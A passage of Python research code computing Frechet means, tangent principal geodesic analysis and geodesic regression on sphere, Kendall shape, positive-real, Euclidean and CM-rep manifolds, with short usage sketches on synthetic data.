Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
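# Usage sketch (illustrative only): the Frechet mean above is gradient descent,
# mu <- Exp_mu( stepsize * (1/N) * sum_j Log_mu( y_j ) ), repeated maxIter times.
# Here we average synthetic samples scattered around the north pole with the helper above.
def _example_frechet_mean_sphere( nSamples = 20, sigma = 0.1 ):
    mu_0 = manifolds.sphere( 3 )
    mu_0.SetPoint( [ 0.0, 0.0, 1.0 ] )
    dataList = [ GaussianNoisePerturbation( mu_0, sigma ) for _ in range( nSamples ) ]
    # The dispatcher routes to FrechetMean_Sphere because dataList[ 0 ].Type == "Sphere"
    return FrechetMean( dataList, maxIter = 200, stepsize = 0.05 )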
def FrechetMean_Kendall2D( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
mu = dataList[0]
nManDim = dataList[ 0 ].nPt
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.kendall2D_tVec( nManDim )
for j in range( nData ):
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
for k in range( 2 ):
dMu.tVector[ k ][ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ k ][ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
def FrechetMean_PosReal( dataList, maxIter = 500, tol = 0.001, stepsize=0.01):
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.pos_real_tVec( nManDim )
for j in range( nData ):
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
def FrechetMean_Euclidean( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.euclidean_tVec( nManDim )
for j in range( nData ):
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( 1.0 / nData ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
def FrechetMean_CMRep( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep( nManDim )
nData = len( dataList )
for i in range( nManDim ):
data_list_pos_i = []
data_list_rad_i = []
for j in range( nData ):
data_list_pos_i.append( dataList[ j ].pt[ i ][ 0 ] )
data_list_rad_i.append( dataList[ j ].pt[ i ][ 1 ] )
mu_pos_i = FrechetMean( data_list_pos_i, maxIter, tol )
mu_rad_i = FrechetMean( data_list_rad_i, maxIter, tol )
mu.SetPosition( i, mu_pos_i.pt )
mu.SetRadius( i, mu_rad_i.pt )
mu.UpdateMeanRadius()
return mu
def FrechetMean_CMRep_BNDRNormals( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep_bndr_normals( nManDim )
nData = len( dataList )
for i in range( nManDim ):
data_list_pos_i = []
data_list_rad_i = []
data_list_spoke1_i = []
data_list_spoke2_i = []
for j in range( nData ):
data_list_pos_i.append( dataList[ j ].pt[ i ][ 0 ] )
data_list_rad_i.append( dataList[ j ].pt[ i ][ 1 ] )
data_list_spoke1_i.append( dataList[ j ].pt[ i ][ 2 ] )
data_list_spoke2_i.append( dataList[ j ].pt[ i ][ 3 ] )
mu_pos_i = FrechetMean( data_list_pos_i, maxIter, tol )
mu_rad_i = FrechetMean( data_list_rad_i, maxIter, tol )
mu_spoke1_i = FrechetMean( data_list_spoke1_i, maxIter, tol )
mu_spoke2_i = FrechetMean( data_list_spoke2_i, maxIter, tol )
mu.SetPosition( i, mu_pos_i.pt )
mu.SetRadius( i, mu_rad_i.pt )
mu.SetSpoke1( i, mu_spoke1_i.pt )
mu.SetSpoke2( i, mu_spoke2_i.pt )
mu.UpdateMeanRadius()
return mu
def FrechetMean_CMRep_Abstract( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep_abstract( nManDim )
nData = len( dataList )
mu_pt_arr = []
for i in range( 4 ):
data_list_i = []
for j in range( nData ):
data_list_i.append( dataList[ j ].pt[ i ] )
mu_i = FrechetMean( data_list_i, maxIter, tol, stepsize )
mu_pt_arr.append( mu_i )
mu.SetPoint( mu_pt_arr )
return mu
def FrechetMean_CMRep_Abstract_Normal( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
mu = manifolds.cmrep_abstract_normal( nManDim )
nData = len( dataList )
mu_pt_arr = []
for i in range( 4 ):
data_list_i = []
for j in range( nData ):
data_list_i.append( dataList[ j ].pt[ i ] )
mu_i = FrechetMean( data_list_i, maxIter, tol, stepsize )
mu_pt_arr.append( mu_i )
mu_bndr1 = []
mu_bndr2 = []
for i in range( nManDim ):
bndr1_list_i = []
bndr2_list_i = []
for j in range( nData ):
bndr1_list_i.append( dataList[ j ].pt[ 4 ][ i ] )
bndr2_list_i.append( dataList[ j ].pt[ 5 ][ i ] )
mu_bndr1_i = FrechetMean( bndr1_list_i, maxIter, tol, stepsize )
mu_bndr2_i = FrechetMean( bndr2_list_i, maxIter, tol, stepsize )
mu_bndr1.append( mu_bndr1_i )
mu_bndr2.append( mu_bndr2_i )
mu_pt_arr.append( mu_bndr1 )
mu_pt_arr.append( mu_bndr2 )
mu.SetPoint( mu_pt_arr )
return mu
def FrechetMean_Scale_Kendall2D( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nPt
mu = manifolds.scale_kendall2D( nManDim )
nData = len( dataList )
mu_pt_arr = []
for i in range( 2 ):
data_list_i = []
for j in range( nData ):
data_list_i.append( dataList[ j ].pt[ i ] )
mu_i = FrechetMean( data_list_i, maxIter, tol, stepsize )
mu_pt_arr.append( mu_i )
mu.SetPoint( mu_pt_arr )
return mu
def WeightedFrechetMean( dataList, wList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
if dataList[ 0 ].Type == "Sphere":
return WeightedFrechetMean_Sphere( dataList, wList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "PositiveReal":
# return FrechetMean_PosReal( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "Euclidean":
# return FrechetMean_Euclidean( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "CMRep":
# return FrechetMean_CMRep( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "CMRep_BNDRNormals":
# return FrechetMean_CMRep_BNDRNormals( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "CMRep_Abstract":
# return FrechetMean_CMRep_Abstract( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "Kendall2D":
# return FrechetMean_Kendall2D( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "Scale_Kendall2D":
# return FrechetMean_Scale_Kendall2D( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def WeightedFrechetMean_Sphere( dataList, wList, maxIter = 500, tol = 0.001, stepsize=0.005 ):
# Weight List should be sum-to-one normalized
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.sphere_tVec( nManDim )
for j in range( nData ):
if np.abs( wList[ j ] ) < 1e-12:
continue
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( wList[ j ] ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
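# Usage sketch (assumes dataList holds sphere points and, as noted above, that the weight
# list is already sum-to-one normalized). Uniform weights reduce to the ordinary Frechet mean.
def _example_weighted_frechet_mean_sphere( dataList ):
    nData = len( dataList )
    wList = [ 1.0 / nData ] * nData
    return WeightedFrechetMean( dataList, wList )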
######################################
########## Tangent PGA ##########
######################################
def TangentPGA( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
if dataList[ 0 ].Type == "Sphere":
return TangentPGA_Sphere( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "PositiveReal":
return TangentPGA_PosReal( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Euclidean":
return TangentPGA_Euclidean( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep":
return TangentPGA_CMRep( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_Abstract":
return TangentPGA_CMRep_Abstract( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def TangentPGA_Sphere( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepsize )
# Covariance matrix on a tangent vector space
S = np.zeros( [ nManDim, nManDim ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.asmatrix( tVec_i.tVector )
u_j_mat = u_j_mat.flatten()
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
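# Usage sketch: tangent PGA returns eigenvalues w (sorted by descending magnitude),
# eigenvector columns v of the tangent-space covariance, and the Frechet mean mu.
# The fraction of variance captured by the first k modes is sum( w[ :k ] ) / sum( w ).
def _example_tangent_pga_sphere( dataList, k = 2 ):
    w, v, mu = TangentPGA( dataList )
    explained = np.sum( w[ :k ] ) / np.sum( w )
    return w, v, mu, explained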
def TangentPGA_PosReal( dataList, maxIter = 500, tol = 0.001, stepsize=0.01):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepsize )
# Covariance matrix on a tangent vector space
S = np.zeros( [ nManDim, nManDim ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.asmatrix( tVec_i.tVector )
u_j_mat = u_j_mat.flatten()
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
def TangentPGA_Euclidean( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepsize )
# Covariance matrix on a tangent vector space
S = np.zeros( [ nManDim, nManDim ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.asmatrix( tVec_i.tVector )
u_j_mat = u_j_mat.flatten()
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
# Deprecated for now
def TangentPGA_CMRep( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
mu = FrechetMean( dataList, maxIter, tol, stepsize )
return mu
def TangentPGA_CMRep_Abstract( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
print( "# of Data" )
print( nData )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepsize )
# Covariance matrix on a tangent vector space
nCenterDim = dataList[ 0 ].pt[ 0 ].nDim
nScaleDim = dataList[ 0 ].pt[ 1 ].nDim
nPreShapeDim = dataList[ 0 ].pt[ 2 ].nDim
nRadiusDim = dataList[ 0 ].pt[ 3 ].nDim
# Total Dimension
nManDim_Cov = nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim
S = np.zeros( [ nManDim_Cov, nManDim_Cov ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.zeros( [ 1, nManDim_Cov ] )
u_j_mat_center = np.asarray( tVec_i.tVector[ 0 ].tVector ).flatten()
u_j_mat_scale = np.asarray( tVec_i.tVector[ 1 ].tVector ).flatten()
u_j_mat_preshape = np.asarray( tVec_i.tVector[ 2 ].tVector ).flatten()
u_j_mat_radius = np.asarray( tVec_i.tVector[ 3 ].tVector ).flatten()
for d in range( nCenterDim ):
u_j_mat[ 0, d ] = u_j_mat_center[ d ]
for d in range( nScaleDim ):
# u_j_mat[ 0, d + nCenterDim ] = dataList[ i ].meanRadius * u_j_mat_scale[ d ]
u_j_mat[ 0, d + nCenterDim ] = u_j_mat_scale[ d ]
for d in range( nPreShapeDim ):
# u_j_mat[ 0, d + nCenterDim + nScaleDim ] = dataList[ i ].meanRadius * u_j_mat_preshape[ d ]
u_j_mat[ 0, d + nCenterDim + nScaleDim ] = u_j_mat_preshape[ d ]
for d in range( nRadiusDim ):
# u_j_mat[ 0, d + nCenterDim + nScaleDim + nPreShapeDim ] = dataList[ i ].meanRadius * u_j_mat_radius[ d ]
u_j_mat[ 0, d + nCenterDim + nScaleDim + nPreShapeDim ] = u_j_mat_radius[ d ]
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
print( u_j_u_j_t.shape )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
def TangentPGA_CMRep_Abstract_Normal_Arr( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nObj = len( dataList )
nData = len( dataList[ 0 ] )
nManDim = dataList[ 0 ][ 0 ].nDim
print( "# of Data" )
print( nData )
mu_arr = []
for i in range( nObj ):
mu_i = FrechetMean_CMRep_Abstract_Normal( dataList[ i ], maxIter, tol, stepsize )
mu_arr.append( mu_i )
return mu_arr
# # Covariance matrix on a tangent vector space
# nCenterDim = dataList[ 0 ][ 0 ].pt[ 0 ].nDim
# nScaleDim = dataList[ 0 ][ 0 ].pt[ 1 ].nDim
# nPreShapeDim = dataList[ 0 ][ 0 ].pt[ 2 ].nDim
# nRadiusDim = dataList[ 0 ][ 0 ].pt[ 3 ].nDim
# nNormal1Dim = len( dataList[ 0 ][ 0 ].pt[ 4 ] )
# nNormal2Dim = len( dataList[ 0 ][ 0 ].pt[ 5 ] )
# # Total Dimension
# nManDim_Cov = ( nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal1Dim * 3 ) ) * nObj
# nManDim_a = nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal1Dim * 3 )
# S = np.zeros( [ nManDim_Cov, nManDim_Cov ] )
# for i in range( nData ):
# u_mat_i = []
# for a in range( nObj ):
# tVec_a_i = mu_arr[ a ].LogMap( dataList[ a ][ i ] )
# u_mat_a_i = tVec_a_i.GetTangentVectorArray()
# u_mat_i.extend( u_mat_a_i )
# u_mat_i = np.asarray( u_mat_i )
# u_i_u_i_t = np.dot( u_mat_i.T, u_mat_i )
# print( u_i_u_i_t.shape )
# S = np.add( S, np.multiply( 1.0 / float( nData ), u_i_u_i_t ) )
# # w : Eigen values
# # v : Eigen vectors
# [ w, v ] = np.linalg.eig( S )
# w_sortIdx = np.abs( w ).argsort()
# w = w[ w_sortIdx[ ::-1 ] ]
# v = v[ :, w_sortIdx[ ::-1 ] ]
# w = np.real( w )
# v = np.real( v )
# return w, v, mu_arr
def TangentPGA_CMRep_Abstract_Normal_Mu_Arr( dataList, mu_arr, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nObj = len( dataList )
nData = len( dataList[ 0 ] )
nManDim = dataList[ 0 ][ 0 ].nDim
print( "# of Data" )
print( nData )
# mu_arr = []
# for i in range( nObj ):
# mu_i = FrechetMean_CMRep_Abstract_Normal( dataList[ 0 ], maxIter, tol, stepsize )
# mu_arr.append( mu_i )
# Covariance matrix on a tangent vector space
nCenterDim = dataList[ 0 ][ 0 ].pt[ 0 ].nDim
nScaleDim = dataList[ 0 ][ 0 ].pt[ 1 ].nDim
nPreShapeDim = dataList[ 0 ][ 0 ].pt[ 2 ].nDim
nRadiusDim = dataList[ 0 ][ 0 ].pt[ 3 ].nDim
nNormal1Dim = len( dataList[ 0 ][ 0 ].pt[ 4 ] )
nNormal2Dim = len( dataList[ 0 ][ 0 ].pt[ 5 ] )
# Total Dimension
nManDim_Cov = ( nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal2Dim * 3 ) ) * nObj
nManDim_a = nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal2Dim * 3 )
S = np.zeros( [ nManDim_Cov, nManDim_Cov ] )
for i in range( nData ):
u_mat_i = []
for a in range( nObj ):
tVec_a_i = mu_arr[ a ].LogMap( dataList[ a ][ i ] )
u_mat_a_i = tVec_a_i.GetTangentVectorArray()
u_mat_i.extend( u_mat_a_i )
u_mat_i = np.asarray( u_mat_i )
u_i_u_i_t = np.dot( u_mat_i.T, u_mat_i )
print( u_i_u_i_t.shape )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_i_u_i_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu_arr
#####################################################################
####### Geodesic Regression Models #######
#####################################################################
def GeodesicRegression( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 0.01, verbose=True ):
if pt_list[ 0 ].Type == "Sphere":
return GeodesicRegression_Sphere( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "PositiveReal":
return GeodesicRegression_PosReal( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "Euclidean":
return GeodesicRegression_Euclidean( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "CMRep":
return GeodesicRegression_CMRep( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "CMRep_Abstract":
return GeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "Kendall2D":
return GeodesicRegression_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "Scale_Kendall2D":
return GeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
else:
print( "Manifold type is not known" )
return -1
def GeodesicRegression_Sphere( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nDimManifold = pt_list[ 0 ].nDim
nData = len( pt_list )
# Initial point on manifold and tangent vector
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
t_max_idx = np.argmax( t_list )
p_end = pt_list[ t_max_idx ]
# Initial point on manifold and tangent vector
init_Interp = manifolds.sphere( nDimManifold )
init_Interp.SetPoint( p_anchor.pt )
init_tVec = p_anchor.LogMap( p_end )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
pt_grad = manifolds.sphere( nDimManifold )
pt_grad.SetPoint( np.zeros( nDimManifold ).tolist() )
tVec_grad = manifolds.sphere_tVec( nDimManifold )
energy = 0.0
for n in range( nData ):
target = pt_list[ n ]
time_pt = t_list[ n ]
current_tangent = manifolds.sphere_tVec( nDimManifold )
for d in range( nDimManifold ):
current_tangent.tVector[ d ] = tangent.tVector[ d ] * time_pt
estimate = base.ExponentialMap( current_tangent )
# Tangent from base to estimate
be = base.LogMap( estimate )
# The tangential error on one data point
et = estimate.LogMap( target )
# Shooting in the opposite direction
eb = estimate.LogMap( base )
# Energy of the tangential error
energy += et.normSquared()
# Calculate adjoint gradient using Jacobi Field
jOutput, jOutputDash = estimate.AdjointGradientJacobi( eb, et, manifolds.sphere_tVec( nDimManifold ) )
# Sum individual gradient from each data point to gradient
for d in range( nDimManifold ):
pt_grad.pt[ d ] = pt_grad.pt[ d ] + jOutput.tVector[ d ]
tVec_grad.tVector[ d ] = tVec_grad.tVector[ d ] + ( jOutputDash.tVector[ d ] * time_pt )
# Gradient * stepSize
pointGradient_Step = manifolds.sphere_tVec( nDimManifold )
for d in range( nDimManifold ):
pointGradient_Step.tVector[ d ] = pt_grad.pt[ d ] * stepSize
# Update Base
newBase = base.ExponentialMap( pointGradient_Step )
# Update Tangent
updatedTangent = manifolds.sphere_tVec( nDimManifold )
for d in range( nDimManifold ):
updatedTangent.tVector[ d ] = tangent.tVector[ d ] + tVec_grad.tVector[ d ] * stepSize
# Parallel translate updated tangent from a previous base to the updated base
newTangent = base.ParallelTranslateAtoB( base, newBase, updatedTangent )
if energy > prevEnergy:
stepSize = stepSize * 0.5
base = prevBase
tangent = prevTangent
if verbose:
print( "==================================" )
print( "Warning: Energy Increased")
print( "Half the step size")
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
else:
prevBase = base
prevTangent = tangent
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
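# Usage sketch (synthetic data, illustrative only): fit a geodesic gamma( t ) = Exp_base( t * tangent )
# to time-indexed sphere points via the adjoint Jacobi-field gradient descent above. The
# ground-truth trend direction [ 0.5, 0, 0 ] at the north pole is an assumption for the demo.
def _example_geodesic_regression_sphere( nData = 15, sigma = 0.05 ):
    p0 = manifolds.sphere( 3 )
    p0.SetPoint( [ 0.0, 0.0, 1.0 ] )
    t_list = np.linspace( 0.0, 1.0, nData ).tolist()
    pt_list = []
    for t in t_list:
        v_t = manifolds.sphere_tVec( 3 )
        v_t.SetTangentVector( [ 0.5 * t, 0.0, 0.0 ] )
        pt_list.append( GaussianNoisePerturbation( p0.ExponentialMap( v_t ), sigma ) )
    return GeodesicRegression( t_list, pt_list, max_iter = 100, stepSize = 0.05, verbose = False )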
def GeodesicRegression_Kendall2D( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nDimManifold = pt_list[ 0 ].nPt
nData = len( pt_list )
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
t_max_idx = np.argmax( t_list )
p_end = pt_list[ t_max_idx ]
# Initial point on manifold and tangent vector
init_Interp = manifolds.kendall2D( nDimManifold )
init_Interp.SetPoint( p_anchor.pt )
init_tVec = p_anchor.LogMap( p_end )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
nUpdated = 0
for i in range( max_iter ):
pt_grad = manifolds.kendall2D( nDimManifold )
tVec_grad = manifolds.kendall2D_tVec( nDimManifold )
energy = 0.0
for n in range( nData ):
target = pt_list[ n ]
time_pt = t_list[ n ]
current_tangent = manifolds.kendall2D_tVec( nDimManifold )
for d in range( nDimManifold ):
for k in range( 2 ):
current_tangent.tVector[ k, d ] = tangent.tVector[ k, d ] * time_pt
estimate = base.ExponentialMap( current_tangent )
# Tangent from base to estimate
be = base.LogMap( estimate )
# The tangential error on one data point
et = estimate.LogMap( target )
# Shooting in the opposite direction
eb = estimate.LogMap( base )
# Energy of the tangential error
energy += et.normSquared()
# Calculate adjoint gradient using Jacobi Field
jOutput, jOutputDash = estimate.AdjointGradientJacobi( eb, et, manifolds.kendall2D_tVec( nDimManifold ) )
# Sum individual gradient from each data point to gradient
for d in range( nDimManifold ):
for k in range( 2 ):
pt_grad.pt[ k, d ] = pt_grad.pt[ k, d ] + jOutput.tVector[ k, d ]
tVec_grad.tVector[ k, d ] = tVec_grad.tVector[ k, d ] + ( jOutputDash.tVector[ k, d ] * time_pt )
# Gradient * stepSize
pointGradient_Step = manifolds.kendall2D_tVec( nDimManifold )
for d in range( nDimManifold ):
for k in range( 2 ):
pointGradient_Step.tVector[ k, d ] = pt_grad.pt[ k, d ] * stepSize
# Update Base
newBase = base.ExponentialMap( pointGradient_Step )
# Update Tangent
updatedTangent = manifolds.kendall2D_tVec( nDimManifold )
for d in range( nDimManifold ):
for k in range( 2 ):
updatedTangent.tVector[ k, d ] = tangent.tVector[ k, d ] + tVec_grad.tVector[ k, d ] * stepSize
# Parallel translate updated tangent from a previous base to the updated base
newTangent = base.ParallelTranslateAtoB( base, newBase, updatedTangent )
if energy >= prevEnergy:
stepSize = stepSize * 0.5
base = prevBase
tangent = prevTangent
if verbose:
print( "==================================" )
print( "Warning: Energy Increased")
print( "Half the step size")
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
else:
prevBase = base
prevTangent = tangent
base = newBase
tangent = newTangent
prevEnergy = energy
nUpdated += 1
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
print( "=============================" )
print( " # of Actual Updates " )
print( nUpdated )
print( "=============================" )
return base, tangent
def GeodesicRegression_PosReal( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nDimManifold = pt_list[ 0 ].nDim
nData = len( pt_list )
# Initial point on manifold and tangent vector
init_Interp = manifolds.pos_real( nDimManifold )
init_tVec = manifolds.pos_real_tVec( nDimManifold )
init_Interp.SetPoint( pt_list[ 0 ].pt )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
pt_grad = manifolds.pos_real( nDimManifold )
pt_grad.SetPoint( np.ones( nDimManifold ).tolist() )
tVec_grad = manifolds.pos_real_tVec( nDimManifold )
energy = 0.0
for n in range( nData ):
target = pt_list[ n ]
time_pt = t_list[ n ]
current_tangent = manifolds.pos_real_tVec( nDimManifold )
for d in range( nDimManifold ):
current_tangent.tVector[ d ] = tangent.tVector[ d ] * time_pt
estimate = base.ExponentialMap( current_tangent )
# Tangent from base to estimate
be = base.LogMap( estimate )
# The tangential error on one data point
et = estimate.LogMap( target )
# Shooting in the opposite direction
eb = estimate.LogMap( base )
# Energy of the tangential error
energy += et.normSquared()
# Calculate adjoint gradient using Jacobi Field
jOutput, jOutputDash = estimate.AdjointGradientJacobi( eb, et, manifolds.pos_real_tVec( nDimManifold ) )
# Sum individual gradient from each data point to gradient
for d in range( nDimManifold ):
pt_grad.pt[ d ] = pt_grad.pt[ d ] + jOutput.tVector[ d ]
tVec_grad.tVector[ d ] = tVec_grad.tVector[ d ] + ( jOutputDash.tVector[ d ] * time_pt )
# Gradient * stepSize
pointGradient_Step = manifolds.pos_real_tVec( nDimManifold )
for d in range( nDimManifold ):
pointGradient_Step.tVector[ d ] = pt_grad.pt[ d ] * stepSize
# Update Base
newBase = base.ExponentialMap( pointGradient_Step )
# Update Tangent
updatedTangent = manifolds.pos_real_tVec( nDimManifold )
for d in range( nDimManifold ):
updatedTangent.tVector[ d ] = tangent.tVector[ d ] + tVec_grad.tVector[ d ] * stepSize
# Parallel translate updated tangent from a previous base to the updated base
newTangent = base.ParallelTranslateAtoB( base, newBase, updatedTangent )
if energy > prevEnergy:
stepSize = stepSize * 0.5
base = prevBase
tangent = prevTangent
if verbose:
print( "==================================" )
print( "Warning: Energy Increased")
print( "Half the step size")
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
else:
prevBase = base
prevTangent = tangent
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
def GeodesicRegression_Euclidean( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
return LinearizedGeodesicRegression_Euclidean( t_list, pt_list, 100, stepSize, step_tol, False, verbose )
